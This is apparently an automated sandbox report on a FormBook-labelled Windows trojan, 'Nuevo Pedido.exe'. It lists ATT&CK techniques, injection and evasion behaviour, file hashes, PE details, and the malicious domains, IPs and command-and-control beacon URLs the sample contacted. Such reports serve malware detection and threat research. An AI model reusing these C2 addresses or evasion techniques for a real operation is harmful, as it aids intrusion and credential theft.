            Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528617 Sample: Nuevo Pedido.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 36 www.trenddoffical.com 2->36 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 6 other signatures 2->46 11 Nuevo Pedido.exe 3 2->11         started        signatures3 process4 file5 28 C:\Users\user\...28uevo Pedido.exe.log, ASCII 11->28 dropped 14 Nuevo Pedido.exe 11->14         started        process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 30 thejohnmatt.com 192.232.250.147, 49838, 80 UNIFIEDLAYER-AS-1US United States 17->30 32 www.tremblock.com 185.53.178.53, 49784, 80 TEAMINTERNET-ASDE Germany 17->32 34 8 other IPs or domains 17->34 38 System process connects to network (likely due to code injection or exploit) 17->38 21 cscript.exe 17->21         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 21->48 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Nuevo Pedido.exe33%VirustotalBrowse
            Nuevo Pedido.exe33%ReversingLabsWin32.Trojan.FormBook

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            3.0.Nuevo Pedido.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            3.2.Nuevo Pedido.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            3.0.Nuevo Pedido.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            3.0.Nuevo Pedido.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            thejohnmatt.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.downingmunroe.online/udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN0%Avira URL Cloudsafe
            http://www.thejohnmatt.com/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN0%Avira URL Cloudsafe
            http://www.onlinedatingthaiweb.com/udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN0%Avira URL Cloudsafe
            http://www.rcepjobs.com0%Avira URL Cloudsafe
            www.spoiledzone.com/udeh/0%Avira URL Cloudsafe
            http://www.rcepjobs.com/udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN0%Avira URL Cloudsafe
            http://www.tremblock.com/udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.rcepjobs.com
            		3.64.163.50
            		truetrue
              		unknown
              www.tremblock.com
              		185.53.178.53
              		truetrue
                		unknown
                thejohnmatt.com
                		192.232.250.147
                		truetrueunknown
                www.downingmunroe.online
                		209.17.116.163
                		truetrue
                  		unknown
                  www.onlinedatingthaiweb.com
                  		185.53.179.91
                  		truetrue
                    		unknown
                    www.sosibibyslot.website
                    		unknown
                    		unknowntrue
                      		unknown
                      www.securebankofamericalog.site
                      		unknown
                      		unknowntrue
                        		unknown
                        www.thejohnmatt.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.trenddoffical.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.blueprintroslyn.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.downingmunroe.online/udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rNtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.thejohnmatt.com/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rNtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.onlinedatingthaiweb.com/udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rNtrue
                              • Avira URL Cloud: safe
                              		unknown
                              www.spoiledzone.com/udeh/true
                              • Avira URL Cloud: safe
                              		low
                              http://www.rcepjobs.com/udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rNtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tremblock.com/udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rNtrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.rcepjobs.comcscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpfalse
                                		high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                185.53.179.91
                                		www.onlinedatingthaiweb.comGermany
                                		61969TEAMINTERNET-ASDEtrue
                                192.232.250.147
                                		thejohnmatt.comUnited States
                                		46606UNIFIEDLAYER-AS-1UStrue
                                185.53.178.53
                                		www.tremblock.comGermany
                                		61969TEAMINTERNET-ASDEtrue
                                3.64.163.50
                                		www.rcepjobs.comUnited States
                                		16509AMAZON-02UStrue
                                209.17.116.163
                                		www.downingmunroe.onlineUnited States
                                		55002DEFENSE-NETUStrue

                                Private

                                IP
                                192.168.2.1

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:528617
                                Start date:25.11.2021
                                Start time:15:08:16
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 10m 48s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Nuevo Pedido.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:26
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@7/1@11/6
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 18.3% (good quality ratio 16.3%)
                                • Quality average: 73%
                                • Quality standard deviation: 32.2%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 124
                                • Number of non-executed functions: 154
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                • Not all processes where analyzed, report is missing behavior information

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:09:08API Interceptor22x Sleep call for process: Nuevo Pedido.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                185.53.178.53Ciikfddtznhxmtqufdujkifxwmwhrfjkcl_Signed_.exeGet hashmaliciousBrowse
                                • www.reversefi.com/qd8i/?xPWH_=LVz4vpXpDf7DLZ&Qp=rcvYkRDnIzNpt4g8o0sJvmmwZ0UwnLmi+6Qa0PCW1CpRdD+roYdanzHZdYMyqKoDIjqk
                                PO210119.exe.exeGet hashmaliciousBrowse
                                • www.tickets2usa.com/2kf/?xPGHVhT0=smpWEJEJTDw4K5WH6R9AAVYOZ8RNDQzAgTDDGy5VZzc1L6k/PvhBcdPX0Lmk5MLprvOJ&9r4P2=J484
                                http://office.esGet hashmaliciousBrowse
                                • office.es/favicon.ico
                                3.64.163.50Zr26f1rL6r.exeGet hashmaliciousBrowse
                                • www.inklusion.online/n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z
                                xDG1WDcI0o.exeGet hashmaliciousBrowse
                                • www.warriorsouls.com/imnt/?w4=173jVSvDSoGUE2AW1ivoK5ykCyKPADg/LonPGNHNCQX2BYegbwJ7vTJYHkxtjawzsEfN&nHNxLR=Q48l
                                Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                • www.evaccines.com/s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP
                                Xl1gbEIo0b.exeGet hashmaliciousBrowse
                                • www.teachermeta.com/btn2/?nRk=QvINNIMzsRYf/0qmivF6Dmovk+WpXAaZUAI4egrxWGuGQnhzgyC+G4dLS9x+/CyjCjh9&sFN0Yx=JL0hlxBhSB
                                Rev_NN doccument.docGet hashmaliciousBrowse
                                • www.brettneoheroes.com/e6b3/
                                202111161629639000582.exeGet hashmaliciousBrowse
                                • www.sketchnfts.com/wkgp/?4h5=jdmv8BZZ/B46r0we2YWB0KZ3uGSoSKuz6a4pN1QKcZ2F8xRxcAMtTOc/gzvsbCezLg9G&2dX=P6APITtHDX2tmpK
                                Ez6r9fZIXc.exeGet hashmaliciousBrowse
                                • www.battlegroundxr.com/ad6n/?G8a0vHm=ZcTQfm3E3Bis9O+U1J+3C+jUHMxN8jyTuxkjib6Q0pkS+Pn4CLfVing+78WMbf+swImY&6lrHq=5jktfN6hH6
                                New Order INQ211118.exeGet hashmaliciousBrowse
                                • www.cleversights.com/ng6c/?JBGdjn1=EPV2/NoACT8dHOR9v1gyCHceGsyPjrlJM+UK8aQEskssrzMl224UALhiEE2fgJmZ+elx&8pB8=1bqLQxdXG
                                Quote.exeGet hashmaliciousBrowse
                                • www.sandspringsramblers.com/g2fg/?1btd=IfCDV&CTEp9H=ge+LGbGWprSeotpzV0+Q+kydhBjB2swQkk5yFtO6ceAAyVR8yEXyjgFWO6AISkVeqI4m
                                111821 New Order_xlxs.exeGet hashmaliciousBrowse
                                • www.methodicalservices.com/oae0/?UDKtfT=0pSD8r20Ixf8_&9rGxtBkx=0YzjOyVp+Yb6xacNTkTkmGCYCJkm2COrsGtOu7+4k+P6CiNE0Q3WT0+8/3B2OogfveoZ
                                rEC0x536o5.exeGet hashmaliciousBrowse
                                • www.evaccines.com/s3f1/?XZeT=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&_dIpGp=dTiPIlmXgVLtX
                                Booking Confirmation 548464656_pdf.exeGet hashmaliciousBrowse
                                • www.metaversealive.com/cfb2/?4hGdfRT=Agu3xtL1ZQO5CFfrtHOGjgVP3skWkN/ViqH4UJ4za8OjNS089a88X4B7IihWeXraBDmd&2dM4Gf=e4hhCbFxvtz0ztm
                                Purchase Order Ref No_ Q51100732.xlsxGet hashmaliciousBrowse
                                • www.fondoflouisville.com/dyh6/?NL0hl=kQyzM0Wln+3leUBi0Wmn3eENdAam7BCJPPELL5jXxpKBYvrw3jMhvOGuqF2XIvtdQ71vEA==&v2M=r0DdC04HWpDX
                                AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                • www.inklusion.online/n8ds/?9rJT=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&at=WtR4GZm
                                order-2021-PO.Pdf.exeGet hashmaliciousBrowse
                                • www.godrejs-windsor.com/vocn/?5jYXyzb=pnlTJGUzE5gMj2POSUsxOYM9XX/o1stqBdRTzx6fWnpbF/A27HO5FUQYdB9AbrLCdWzy&IL08W8=d6AXkVBHUjyXZ
                                Inquiry Sheet.docGet hashmaliciousBrowse
                                • www.babehairboutique.com/cy88/?7nLpW=-ZKlyLs0ebYdGfJ&QZ=K8MP/gXd9fA79gQ3nARZg5fl4N3QoqdUhkC4TU9uNhwqyFbAVwd8tffptZPcvcemife8Lg==
                                PO-No 243563746 Sorg.exeGet hashmaliciousBrowse
                                • www.webmakers.xyz/seqa/?tvv=ihZT8RaXnH5DP6&R48TL=PArQXewhCLQ/aGYQG57zH1nhkqDi1nj517XyI5njozHkI0sb3Vjromuzr7tZwLe6Yf/2
                                ORDER REMINDER.docGet hashmaliciousBrowse
                                • www.quetaylor.com/zaip/?r2JPlFDH=HAqh6cOe6LTcTwCBF16MZHaJ4csidjMHsZ2CzJlUzLX8i4OfANm4LybqNg7cEAPcNuVe8g==&Ozu8Z=qxoHsxEPs4u
                                Order Specification.docGet hashmaliciousBrowse
                                • www.vestamobile.com/c28n/?-Zl=BwxsM8rRu+R6ZjIadp4KdiQptkWWHTzqe5Z/ld4s21xj8K8eoUYG89NnPoNyzSQIYa401Q==&Rnjl=fpapUTW
                                Company Profile.exeGet hashmaliciousBrowse
                                • www.foxtmz.com/dc02/?1bNDudv=jqmdPTLkNRVMK4Spw6uhP9oU8xT3oy405F5bn/JxP7BlJCyt3yS/r4AEAC6uqXEsbJlK&Tp=NBZl4DOPndid

                                Domains

                                No context

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                UNIFIEDLAYER-AS-1USsurvey-1384723731.xlsGet hashmaliciousBrowse
                                • 192.185.79.2
                                survey-1378794827.xlsGet hashmaliciousBrowse
                                • 192.185.79.2
                                survey-1384723731.xlsGet hashmaliciousBrowse
                                • 192.185.79.2
                                survey-1378794827.xlsGet hashmaliciousBrowse
                                • 192.185.79.2
                                QUOTATION REQUEST DOCUMENTS - GOTO TRADING.exeGet hashmaliciousBrowse
                                • 162.240.9.164
                                SecuriteInfo.com.VHO.Trojan-PSW.MSIL.Stealer.gen.30557.exeGet hashmaliciousBrowse
                                • 192.185.84.191
                                Swift Copy TT.docGet hashmaliciousBrowse
                                • 50.116.86.94
                                8M5ZqXSa28.exeGet hashmaliciousBrowse
                                • 192.185.129.44
                                Change Order - Draw #3 .htmGet hashmaliciousBrowse
                                • 162.214.66.227
                                new-1834138397.xlsGet hashmaliciousBrowse
                                • 108.179.253.213
                                new-1834138397.xlsGet hashmaliciousBrowse
                                • 108.179.253.213
                                new-1179494065.xlsGet hashmaliciousBrowse
                                • 108.179.253.213
                                Hsbc swift.exeGet hashmaliciousBrowse
                                • 192.232.249.14
                                new-1179494065.xlsGet hashmaliciousBrowse
                                • 108.179.253.213
                                microcomputer Official Order.exeGet hashmaliciousBrowse
                                • 192.185.84.191
                                Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                • 70.40.220.123
                                t 2021.HtMLGet hashmaliciousBrowse
                                • 192.185.129.43
                                New Order778880.exeGet hashmaliciousBrowse
                                • 192.185.167.112
                                IyRUJT27dd.exeGet hashmaliciousBrowse
                                • 192.185.113.96
                                LlDlHiVEJQ.exeGet hashmaliciousBrowse
                                • 162.241.24.173
                                TEAMINTERNET-ASDEff0231.exeGet hashmaliciousBrowse
                                • 185.53.178.54
                                xDG1WDcI0o.exeGet hashmaliciousBrowse
                                • 185.53.179.92
                                nHSmNKw7PN.exeGet hashmaliciousBrowse
                                • 185.53.178.54
                                PjvBTyWpg6.exeGet hashmaliciousBrowse
                                • 185.53.177.20
                                Telex.exeGet hashmaliciousBrowse
                                • 185.53.177.53
                                rEC0x536o5.exeGet hashmaliciousBrowse
                                • 185.53.178.54
                                Tax payment invoice - Wd, November 17, 2021,pdf.exeGet hashmaliciousBrowse
                                • 185.53.179.90
                                PO_ MOQ883763882.docGet hashmaliciousBrowse
                                • 185.53.178.12
                                Order Specification.docGet hashmaliciousBrowse
                                • 185.53.178.12
                                29383773738387477474774.exeGet hashmaliciousBrowse
                                • 185.53.177.53
                                Tax payment invoice - Wed, November 10, 2021,pdf.exeGet hashmaliciousBrowse
                                • 185.53.179.90
                                Factura_842.pdf.exeGet hashmaliciousBrowse
                                • 185.53.178.50
                                Draft shipping docs CI+PL.xlsxGet hashmaliciousBrowse
                                • 185.53.177.10
                                32vCkFTS0X.exeGet hashmaliciousBrowse
                                • 185.53.179.94
                                61Wq3BOwiA.exeGet hashmaliciousBrowse
                                • 185.53.178.51
                                Order Information.exeGet hashmaliciousBrowse
                                • 185.53.179.94
                                lCFjxhAqu3.exeGet hashmaliciousBrowse
                                • 185.53.178.10
                                2FNlQLySZS.exeGet hashmaliciousBrowse
                                • 185.53.178.13
                                o4EjNRKCKq.exeGet hashmaliciousBrowse
                                • 185.53.178.30
                                tgSQwVSEzE.exeGet hashmaliciousBrowse
                                • 185.53.177.12

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo Pedido.exe.log
                                Process:C:\Users\user\Desktop\Nuevo Pedido.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2239
                                Entropy (8bit):5.354287817410997
                                Encrypted:false
                                SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                MD5:913D1EEA179415C6D08FB255AE42B99D
                                SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                Malicious:true
                                Reputation:moderate, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.844153530186034
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:Nuevo Pedido.exe
                                File size:444928
                                MD5:159c46c59cd8ecb7a2bce707de1bc370
                                SHA1:e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
                                SHA256:7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
                                SHA512:909c79f9172d2d525d25a02e050fd55d2043fbf257479de73a70bcb323984da620aac0abdb105194e88a5df8b135d5d27ee1e69ee56511211a89c4e911155417
                                SSDEEP:12288:ZRGvM0ReBZwHIRu6HfMTr6hNprMfGmzGixBFm:ZRIM0ReBZwHkHIrGholGi1
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.a..............0.................. ........@.. ....................... ............@................................

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x46ddfe
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x619F6582 [Thu Nov 25 10:29:22 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [ebp+0800000Eh], ch
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6ddac0x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x5ec.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x6be140x6c000False0.883305302373data7.85660170333IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0x6e0000x5ec0x600False0.438802083333data4.21429058876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
